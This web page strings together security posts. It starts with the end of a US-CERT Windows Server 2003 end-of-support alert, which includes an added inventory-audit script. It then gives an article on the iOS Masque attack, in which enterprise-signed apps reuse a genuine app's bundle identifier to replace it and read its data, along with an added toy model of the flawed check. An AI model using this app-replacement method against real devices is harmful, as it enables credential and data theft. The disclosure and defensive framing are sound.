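The first step in any migration is knowing which hosts are actually affected. As an added check (not part of the US-CERT alert), the following Python script reads an inventory export and flags the hosts that the July 14, 2015 end-of-support date applies to, reporting how many days remain or how long ago support ended. Only the product family and its date come from the alert; the inventory lines, hostnames and the reference date are constructed for the illustration.

```python
"""Flag inventory hosts running an operating system past or near its end of support.

Added example, not part of the US-CERT alert. The END_OF_SUPPORT entry for
Windows Server 2003 is the date given in TA14-310A; the CSV inventory and the
reference dates used below are constructed for the illustration.
"""
import csv
import io
from datetime import date
from typing import Dict, List, Optional

# Product family (matched as a prefix of the inventory OS string) -> end of support
END_OF_SUPPORT: Dict[str, date] = {
    "Windows Server 2003": date(2015, 7, 14),  # from TA14-310A
}

# Constructed inventory export in the shape of a CMDB/AD dump: one host per row
SAMPLE_INVENTORY = """\
hostname,operating_system,last_seen
fs01,Windows Server 2003 R2 Standard,2015-06-30
dc02,Windows Server 2012 R2 Standard,2015-06-30
app07,Windows Server 2003 Enterprise x64,2015-06-29
web03,Ubuntu 14.04,2015-06-30
"""


def end_of_support_for(os_name: str) -> Optional[date]:
    """Return the end-of-support date for the product family os_name belongs to."""
    for family, eol in END_OF_SUPPORT.items():
        if os_name.startswith(family):
            return eol
    return None


def audit(inventory_csv: str, today: date) -> List[dict]:
    """List hosts whose OS has a known end-of-support date, sorted by hostname.

    status is "expiring" while support is still active and "unsupported" once
    the end-of-support date has passed relative to `today`.
    """
    findings = []
    for row in csv.DictReader(io.StringIO(inventory_csv)):
        eol = end_of_support_for(row["operating_system"])
        if eol is None:
            continue  # OS not tracked in END_OF_SUPPORT
        days_left = (eol - today).days
        findings.append({
            "hostname": row["hostname"],
            "os": row["operating_system"],
            "eol": eol.isoformat(),
            "days_until_eol": days_left,
            "status": "unsupported" if days_left < 0 else "expiring",
        })
    return sorted(findings, key=lambda f: f["hostname"])


if __name__ == "__main__":
    # Constructed reference date two weeks before the end-of-support date
    for finding in audit(SAMPLE_INVENTORY, date(2015, 6, 30)):
        print(finding)
```

Running the audit with a reference date after July 14, 2015 turns every Server 2003 finding into "unsupported", which is the set of hosts the compliance and risk statements above apply to. The prefix match on the OS string is deliberate, since inventory tools report editions and architectures ("R2 Standard", "Enterprise x64") with the family name first.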

References

[1] Microsoft Product Lifecycle Listing
[2] Microsoft Support Lifecycle Policy FAQ
[3] Redmond Magazine, Prepare for Windows Server 2003's End of Support
[4] Windows Server 2003 Migration Support
[5] TechTarget, Weighing next steps following Windows Server 2003 end-of-life

Revision History

November 10, 2014: Initial Release

One more iOS attack

Researchers at FireEye identified a new attack dubbed the Masque, which allows attackers to replace a genuine app with a malicious one.

In recent days the Apple community has discovered that iOS is vulnerable to WireLurker, a new strain of malware able to infect Apple iPhones and iPads and siphon user data.

The malware was first discovered by experts at Palo Alto Networks, who revealed that it exhibited behavior never before seen in malware targeting Apple mobile devices; unfortunately, it has yet to be patched.

While security experts analyze the WireLurker case, the disclosure of a new attack in the wild exploiting a vulnerability dubbed Masque is attracting their interest. In practice, exploitation of the Masque flaw allows bad actors to overwrite installed apps with trojanized apps signed with an enterprise certificate.

The Masque vulnerability allows an attacker to swap out a legitimate iOS app for a malicious one; the attack scheme is effective against both jailbroken and non-jailbroken devices.

Masque affects iOS 7.1.1, 7.1.2, 8.0, 8.1, and 8.1.1 beta. Its attack scheme differs from that of WireLurker, which infects Apple mobile devices once they are connected via USB: Masque can also be run remotely via an SMS or email message pointing the victim toward a malicious app.

Also in this case the problem seems to be caused by a weak implementation of an authentication step: Tao Wei, a senior staff research scientist at FireEye, explained that Apple’s enterprise provisioning feature does not check the digital certificates of apps that share the same bundle identifier.

The enterprise provisioning service implemented by Apple allows enterprise iOS developers to develop and distribute iOS apps without having to upload the app to Apple.

“FireEye mobile security researchers have discovered that an iOS app installed using enterprise/ad-hoc provisioning could replace another genuine app installed through the App Store, as long as both apps used the same bundle identifier.”

“This vulnerability exists because iOS doesn’t enforce matching certificates for apps with the same bundle identifier,” Tao Wei said in the company’s blog post. “An attacker can leverage this vulnerability both through wireless networks and USB. iOS doesn’t check certificates during updating. Attackers can replace the old app with a fake app.” “Currently there is not MDM API to get the certificate information for each app,” Wei said. “Thus, it is difficult for the MDM to detect such attacks.”

Speaking about WireLurker, Wei explained that it is the only attack observed so far that exploits the Masque vulnerability. Recall that in a first stage the WireLurker malware infects a host (desktop or laptop) that downloaded the malicious software from the web, then waits for an Apple device (i.e. an iPhone or iPad) to be connected via USB.

Once the Apple device is connected to the infected PC, WireLurker scans its installed applications; if a target app is present, it copies the app from the mobile device to the host, infects it, and installs it again on the mobile device.

The blog post published by FireEye also includes a demonstration of the attack: the experts exploited Masque to replace a genuine Gmail app downloaded from the Apple App Store with a malicious version of the same app able to siphon the user’s messages. The attack starts with an SMS sent to the victim inviting them to download a new version of an apparently legitimate app, “New Flappy Bird”.

“In one of our experiments, we used an in-house app with a bundle identifier “com.google.Gmail” with a title “New Flappy Bird”. We signed this app using an enterprise certificate. When we installed this app from a website, it replaced the original Gmail app on the phone,” the post states. “By using the Masque attack, attackers can get all your existing sensitive data on your iPhone,” Wei added.
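The root cause described above, that the bundle identifier alone decides whether a package is accepted as a replacement for an installed app, is easiest to see in a small model. The following Python example is added here and is not FireEye's or Apple's code: it keeps one app record per bundle identifier and replays the Gmail / “New Flappy Bird” experiment under two policies. The "bundle_id_only" policy reproduces the behaviour the article describes, including the fact that the replacement inherits the original app's local data directory; the "bound_signer" policy shows the general fix principle (a replacement must also be signed by the same identity as the app already installed), not Apple's actual implementation. Signer labels, titles and the data-directory contents are constructed for the illustration.

```python
"""Toy model of the app-replacement check the article describes.

Added example; not FireEye's or Apple's code. Policy "bundle_id_only" mirrors
the behaviour described in the article (a matching bundle identifier is enough
to replace the installed app). Policy "bound_signer" demonstrates the general
remedy: the replacement must be signed by the same identity as the installed
app. Signer labels, titles and data-directory contents are constructed.
"""
from dataclasses import dataclass
from typing import Dict, List


@dataclass(frozen=True)
class AppPackage:
    bundle_id: str  # CFBundleIdentifier-style string, e.g. "com.google.Gmail"
    signer: str     # constructed label standing in for the signing certificate
    title: str      # display name shown to the user


class Device:
    """Minimal install registry keyed on bundle identifier."""

    def __init__(self, policy: str) -> None:
        if policy not in ("bundle_id_only", "bound_signer"):
            raise ValueError("unknown policy: " + policy)
        self.policy = policy
        self.installed: Dict[str, AppPackage] = {}
        self.data_dirs: Dict[str, List[str]] = {}  # per-bundle local data

    def install(self, pkg: AppPackage) -> str:
        current = self.installed.get(pkg.bundle_id)
        if current is None:
            self.installed[pkg.bundle_id] = pkg
            self.data_dirs.setdefault(pkg.bundle_id, [])
            return "installed"
        # Same bundle identifier already present: update or takeover?
        if self.policy == "bound_signer" and current.signer != pkg.signer:
            return "rejected: signer mismatch for " + pkg.bundle_id
        # Replacement keeps the existing data directory, as the article notes
        self.installed[pkg.bundle_id] = pkg
        return "replaced"


def run_scenario(policy: str) -> Dict[str, object]:
    """Replay the FireEye experiment from the article under the given policy."""
    device = Device(policy)
    genuine = AppPackage("com.google.Gmail", "signer:app-store", "Gmail")
    device.install(genuine)
    # Constructed local data left behind by the genuine app
    device.data_dirs["com.google.Gmail"].append("cached-mail.db")

    # Enterprise-signed package that reuses the Gmail bundle identifier
    lookalike = AppPackage("com.google.Gmail", "signer:enterprise-team",
                           "New Flappy Bird")
    result = device.install(lookalike)
    owner = device.installed["com.google.Gmail"]
    return {
        "result": result,
        "owner_title": owner.title,
        "owner_signer": owner.signer,
        "data_reachable_by_owner": list(device.data_dirs["com.google.Gmail"]),
    }


if __name__ == "__main__":
    for policy in ("bundle_id_only", "bound_signer"):
        print(policy, run_scenario(policy))
```

Under "bundle_id_only" the package titled “New Flappy Bird” ends up owning the com.google.Gmail slot together with the cached data the genuine app left behind, which is exactly the data-access consequence FireEye describes; under "bound_signer" the same package is rejected and the genuine app and its data stay in place. The model also makes Wei's MDM remark concrete: a fleet inventory that records only bundle identifiers cannot tell the two situations apart, since both show com.google.Gmail as installed.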

Masque demonstration

The attack is very dangerous: a bad actor would be able to mimic the original app to steal a user’s credentials, and the risk is serious if we think of the possibility of also compromising signed banking apps. Experts at FireEye also explained that user data stored in the legitimate app’s directory, including local data caches, could be accessed by the malware.

“Masque Attacks can replace authentic apps, such as banking and email apps, using attacker’s malware through the Internet. That means the attacker can steal user’s banking credentials by replacing an authentic banking app with a malware that has identical UI. Surprisingly, the malware can even access the original app’s local data, which wasn’t removed when the original app was replaced. These data may contain cached emails, or even login-tokens which the malware can use to log into the user’s account directly.”

The main concern for the security community is how simple the Masque vulnerability is to exploit.

“It is a very powerful [vulnerability], but at the same time, it is very easy to exploit,” Wei said. “It can make the enterprise provisioning attack more powerful and more coverage over the victim. It’s easy to exploit and that’s why we are so concerned and why we think users should be warned.”

To avoid falling victim to a Masque attack, it is suggested to adopt some simple practices:
Do not download mobile apps by clicking on a link received via email or text message, or present on a web page.
Don’t install apps offered in pop-ups from third-party websites.
If the mobile device displays an alert about an “Untrusted App Developer,” click “Don’t Trust” on the alert and uninstall the application.

Pierluigi Paganini

The Silent Danger in Our Vehicles: Critical Vulnerabilities in SinoTrack GPS Devices

Hello everyone! As CISO of Doutornet Tecnologia, I am always attentive to trends and, more importantly, to emerging risks in the landscape of ...